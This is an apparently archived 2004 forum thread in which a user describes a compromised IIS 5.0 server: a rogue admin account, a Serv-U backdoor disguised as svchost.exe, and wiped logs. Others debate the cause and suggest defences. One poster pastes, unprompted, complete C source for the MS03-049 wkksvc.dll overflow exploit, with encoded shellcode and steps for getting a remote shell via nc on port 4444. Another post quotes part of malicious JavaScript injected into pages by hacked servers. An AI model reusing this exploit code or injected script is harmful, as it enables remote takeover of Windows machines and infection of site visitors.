Hi guys...I thought I'd let you know that this morning I woke up to a logon screen with a nice little error message from inetinfo.exe stating that the program had tried to execute at a memory reference inaccessible by the program. From earlier research into network security and particularly the buffer overflow, I realised that it was possible that my system had been compromised.
After logging in I decided to check the application event logs to get a more detailed description of what had happened...there were no logs so I proceeded to check for newly made user accounts...there was one. Similar to a typical characteristic of an administrative user added from a command prompt, this user belonged to the user groups "Users" and "Administrators". I disabled this user and decided to start looking for trojans or other backdoor server software. Using fport, I was able to identify a program named svchost.exe running in the folder "C:\WINNT\System32\dllcache" on port 6135 (TYPICAL!). Connecting to this port left me with a plain 220 error code. Realising this was probably either an HTTP server or an FTP server, I tried issuing a USER command and received "331 User name okay, need password".
I then removed all registry entries referencing this program, restarted the box, and deleted, what I presume to be, "Serv-U" FTP Server.
So, by now, I was convinced that my box had been taken over by hackers and decided to see if I could identify how the hackers exploited the IIS 5.0 server (inetinfo.exe), by examining the W3 service logs...there were none. I then remembered back to a time when a partition table became corrupt on an old hard disk drive of mine, and was able to recover the logfiles with an advanced file recovery program...but from looking at the previous weeks logfiles for the website running on my system, I can't identify anything unusual about any of the log entries made except for some attempts to execute cmd.exe via unicode (blocked) and some 404 messages to requests to scripts that do not exist on my website.
I am not running any 3rd party server software from my system, all patches have been applied from windowsupdate and all packets to unnecessary open ports are filtered out by my router. I'm led to believe that there is a new IIS exploit of some sort circulating in the wild and would like to know more if anyone has any information or has had any similar experiences.
Full Version: Possible New Iis 5.0 Exploit
you sure you are patched? does not sound like it.
| QUOTE (Zekk @ Jun 22 2004, 04:39 PM) |
| you sure you are patched? does not sound like it. |
It's patched believe me! I've tested the WebDAV root exploit against the box, scanned it with a unicode scanner and used some security scanning software (GFI LANGuard).
did u try .htr and ssl too ?
| QUOTE (touk @ Jun 22 2004, 04:48 PM) |
| did u try .htr and ssl too ? |
.htr is tested by GFI and SSL isn't even accessible from outside the network. The box in question has served 3 websites for more than 18 months now without it ever being subject to a successful attack by a hacker.
yeah i heard something about a new exploit,but only a very little bit.someone on irc said:
<1>:anyone knows the new iis 6.0 exploit?friend of mine told me
<2>:nope,never heard of it.could it be that your friend is into the security scene?
<1>.yes indeed
^^ seems strange,lets wait what comes
<1>:anyone knows the new iis 6.0 exploit?friend of mine told me
<2>:nope,never heard of it.could it be that your friend is into the security scene?
<1>.yes indeed
^^ seems strange,lets wait what comes
Just guessing, of course , but if there are other systems in a trusted part of your network, have they been checked for problems?
If you didn't find any way to get in from outside, check whatever might be considered as trusted inside or through dialup, VPN access, RADIUS etc. (Don't forget the laptops that come and go)
I found one situation where a client system inside a trusted network had become compromised by a sneakernet install of a "media player" and used TFTP to upload malware to the server. From there, the back door was opened.
HTH
If you didn't find any way to get in from outside, check whatever might be considered as trusted inside or through dialup, VPN access, RADIUS etc. (Don't forget the laptops that come and go)
I found one situation where a client system inside a trusted network had become compromised by a sneakernet install of a "media player" and used TFTP to upload malware to the server. From there, the back door was opened.
HTH
I know this shoudnīt be here but I canīt start a thread so move it to a new thread if needed...
Here is an interesting exploit... (wkksvc.dll buffer overflow exploit)
Here is an interesting exploit... (wkksvc.dll buffer overflow exploit)
| CODE |
| */ #include <windows.h> #include <winbase.h> #include <lm.h> #include "LMJoin.h" //prolly don't need this but what the hey. #include <winnls.h> #include <stdio.h> #include <string.h> typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL, IN LPCWSTR AlternateName, IN LPCWSTR DomainAccount OPTIONAL, IN LPCWSTR DomainAccountPassword OPTIONAL, IN ULONG Reserved ); int main(int argc, char **argv) { char overwrite[2045] = ""; char sc[] = "\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff" "\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2" "\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80" "\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09" "\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6" "\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf" "\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad" "\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81" "\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81" "\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80" "\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80" "\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80" "\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80" "\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80" "\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81" "\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6" "\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3" "\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50" "\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4" "\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4" "\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4" "\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f" "\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b" "\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80" "\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89" "\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80" "\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83" "\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83" "\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78" "\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c" "\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b" "\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04"; char exp_buf[2045+4+16+501]; char ip[30]; LPWSTR ipl[60]; DWORD jmpesp = 0x7518A747; LPWSTR unicode[(2045+4+16+501)*2]; int i = 0; int len = 0; HINSTANCE hinstLib; MYPROC ProcAddr; BOOL fFreeResult, fRunTimeLinkSuccess = FALSE; if (argc < 2) { fprintf(stderr, "ms03-049 wkksvc.dll buffer overflow by wirepair.\n"); fprintf(stderr, "Usage: %s <ip>\n",argv[0]); fprintf(stderr, "C:\\>net use \\\\ip.ip.ip.ip\\IPC$ \"\" /u:\"\""\ "\nC:\\>0349 ip.ip.ip.ip\n"\ "open new cmd:\n"\ "C:\\>nc ip.ip.ip.ip 4444\n"\ "If it doesn't hang the ip's invalid or it did not work\n"); exit(1); } printf("Attacking: %s\n",argv[1]); _snprintf(ip, 24, "\\\\%s", argv[1]); // i should've used vsprintf() >:) hinstLib = LoadLibrary("netapi32.dll"); memset(overwrite, 0x41, 2000); memset(overwrite+2000, 0x90, 44); memcpy(exp_buf, overwrite, 2044); memcpy(exp_buf+2044, &jmpesp, 4); memset(exp_buf+2048, 0x90, 16); memcpy(exp_buf+2064, sc, sizeof(sc)); MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60); wprintf(L"\n%s",ipl); len = MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicode,sizeof(unicode)); if (hinstLib != NULL) { ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName"); if (NULL != ProcAddr) { fRunTimeLinkSuccess = TRUE; printf("\nGetProcAddr: %x\n", *ProcAddr); printf("Sending exploit, you should be able to nc to the host\n"); (ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0); } else { printf("procaddr null\n"); } fFreeResult = FreeLibrary(hinstLib); } else { printf("hinst null\n"); } return(0); } |
"ms03-049"
old one oO
regards
usch
old one oO
regards
usch
a positble way is that maybe some hackeed a computer on your lan and did a lan hack...
Can u give us the entry from the eventlog??
| QUOTE (isaiah @ Jun 22 2004, 07:46 PM) |
| a positble way is that maybe some hackeed a computer on your lan and did a lan hack... |
I thought of this already but even if they did compromise another computer on the network, they wouldn't be able to access this one from inside because:
1) There is no domain controller,
2) All shares are disabled including $Admin and $IPC,
3) Local IP Security Policies only allow connections to port 21, 53 and 80,
4) I only use strong passwords for user accounts.
I'm pretty sure this was an outside job.
| QUOTE (brOmstar @ Jun 22 2004, 07:57 PM) |
| Can u give us the entry from the eventlog?? |
The event logs had been wiped clean but the message I recieved at the logon screen contained two memory references. I only wish I wrote them down now but they were something like 0x1axxxxxx and 0x19xxxxxx.
I'm led to believe that this error could have occurred as a result of trying to execute code in memory that it is not allowed to access. Maybe an incorrect offset could have been used in an attempt to execute shellcode entered into a buffer somewhere?
Have a copy of the logs you could send me?
T3cHn0b0y u running sql?
just a thought, very interesting post tho
ideas;
i) turn your box into a honeypot trap for when they come back on the specified port :-)
ii) install SNORT, keep your server exactly as is (with the exploit removed) and see if they come back for another go :-)
just a thought, very interesting post tho
ideas;
i) turn your box into a honeypot trap for when they come back on the specified port :-)
ii) install SNORT, keep your server exactly as is (with the exploit removed) and see if they come back for another go :-)
something doesnt look right here technoboy.
someone using an unpublished IIS exploit for sure doesnt drop a easy trackable servu in the dllcache folder nor would he use clean.exe to delete all your log files.
nor would he let the error message sit on your screen.
and he wouldnt create a new administrator account on your machine.
all this looks more like the job of a scriptkid/fxpler and that would be the first time this people code their own exploits of a software 10000 of others try to find bugs in.
recheck everything again!!
you looked at the date of the servu executable? maybe they hacked you awhile ago with a common exploit and misused your PC in a way that your IIS server crashed.
thats not the job of someone who knows what he is doing
someone using an unpublished IIS exploit for sure doesnt drop a easy trackable servu in the dllcache folder nor would he use clean.exe to delete all your log files.
nor would he let the error message sit on your screen.
and he wouldnt create a new administrator account on your machine.
all this looks more like the job of a scriptkid/fxpler and that would be the first time this people code their own exploits of a software 10000 of others try to find bugs in.
recheck everything again!!
you looked at the date of the servu executable? maybe they hacked you awhile ago with a common exploit and misused your PC in a way that your IIS server crashed.
thats not the job of someone who knows what he is doing
my thougheds exactly killaloop.
it qould also been done with a local-exploit perhaps, or an emailtrojan/worm
it qould also been done with a local-exploit perhaps, or an emailtrojan/worm
i dont know if iam any help, but i might got some information
i had the same problem with my winxp box, when windows started it displayed error that inetinfo.exe was missing. My idea was that hackers planted a system service on my pc and i deleted it, but it is still looking for the file.
i have got lsass running though, and i think i got hacked on that, iam on range 85.*.*.* which gets scanned alot by botnets...
iam behind router to, so that makes two of us:D
the svchost.exe is probally an exploit scanner, like a renamed scan500.exe.
i had the same problem with my winxp box, when windows started it displayed error that inetinfo.exe was missing. My idea was that hackers planted a system service on my pc and i deleted it, but it is still looking for the file.
i have got lsass running though, and i think i got hacked on that, iam on range 85.*.*.* which gets scanned alot by botnets...
iam behind router to, so that makes two of us:D
the svchost.exe is probally an exploit scanner, like a renamed scan500.exe.
Killaloop, thanks for the reply. The suggestion to check the date of the svchost.exe executable was good but after deleting it and restoring it, the timestamp was modified to todays date. However, I did manage to sort all files found on my computer by the date last modified and came accross a text file containing a script to download svchost.exe from an ftp server. The last modified timestamp of this file is dated 20/06/2004 12:07.
I decided to visit the windows update website to check the dates of when all my patches were applied, the most recent being the 10th of June 2004 (Direct X 9.0 Update). I think this proves that the system was fully patched and has been compromised by exploiting a vulnerability unknown to the public.
I decided to visit the windows update website to check the dates of when all my patches were applied, the most recent being the 10th of June 2004 (Direct X 9.0 Update). I think this proves that the system was fully patched and has been compromised by exploiting a vulnerability unknown to the public.
it wouldn't surprise me in the least if there was a new and unpublished iis 5/6 hole,
and it's not uncommon for script kiddies to get their hands on these kinds of things
(remember kevin mitnick?). if you can recover any of the deleted logfiles, or if
there's anything at all unusual that shows up in any of the logs you still have,
please post them here for review.
also, setting up a honeypot is a really good idea....if it is an unpublished exploit
and they do come around for another go, you just learned something your not
supposed to know ;p
also, what ftp server was set in the script?
and it's not uncommon for script kiddies to get their hands on these kinds of things
(remember kevin mitnick?). if you can recover any of the deleted logfiles, or if
there's anything at all unusual that shows up in any of the logs you still have,
please post them here for review.
also, setting up a honeypot is a really good idea....if it is an unpublished exploit
and they do come around for another go, you just learned something your not
supposed to know ;p
also, what ftp server was set in the script?
can you recover your log files ?
there is a suggestion of a possible 0day @ http://isc.sans.org/
Once IIS servers are compromised, an .exe is run on the server. This configures the IIS server to create malicious web pages that have hostile JavaScript code in the footer of every web page created by the server.
So far it looks like it uses 2 vulnerabilities in conjunction with one another and does affect patched boxes as well on the client side when viewing infected sites/host
Excerpt from code- you can view the javascript in it's entirety on the enclosed links
So far it looks like it uses 2 vulnerabilities in conjunction with one another and does affect patched boxes as well on the client side when viewing infected sites/host
Excerpt from code- you can view the javascript in it's entirety on the enclosed links
| QUOTE |
| var qxco7=document.cookie;function gc099(n21){var ix=qxco7.indexOf(n21+"=");if(ix==-1)return null;ix=qxco7.indexOf("=",ix)+1;var es=qxco7.indexOf(";",ix);if(es==-1)es=qxco7.length;return unescape(qxco7.substring(ix,es));}function sc088(n24,v8){var today=new Date();var expiry=new Date(today.getTime()+600000);if(v8!=null&&v8!="")document.cookie=n24+"="+escape(v8)+"; expires="+expiry.toGMTString();qxco7=document.cookie;}function okx12(){window.status="";setTimeout("okx12()", 200);}okx12();if(location.href.indexOf("https")!=0){if(gc099("trk716")==null){document.write("<script language=\"JavaScript\" src=\ |
This has been in effect now for around 9-10 days.
IIS 0 Day Hack Info
Additional reading material
More on IIS Hack
appears that they must be a new exploit for IIS server, but what it is , ??? no idea but it is also adding and using the IE exploit , which as far as i know M$ aren't patching .. as i think they don't or yet know how to patch it or they would of.
Thing is , if think about it , if you use say IIS SSL exploit and amend the server so that everyone who visits gets infected with a rootkit etc, or some virus and then reports back to a server and automates the download etc of a proxy / ftp etc and then logs that somewhere else , you would infect hundreds of folk ... as plenty of IIS exploits , also possible that the people infect may have a IIS server that is patched , then goes on , so question is this some sort of automated worm or is it a new exploit ...
Thing is , if think about it , if you use say IIS SSL exploit and amend the server so that everyone who visits gets infected with a rootkit etc, or some virus and then reports back to a server and automates the download etc of a proxy / ftp etc and then logs that somewhere else , you would infect hundreds of folk ... as plenty of IIS exploits , also possible that the people infect may have a IIS server that is patched , then goes on , so question is this some sort of automated worm or is it a new exploit ...
I would take the advice of instaling Snort and waiting for another attck and see if the logs on that help. Especially as snort logs won't be looked for
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
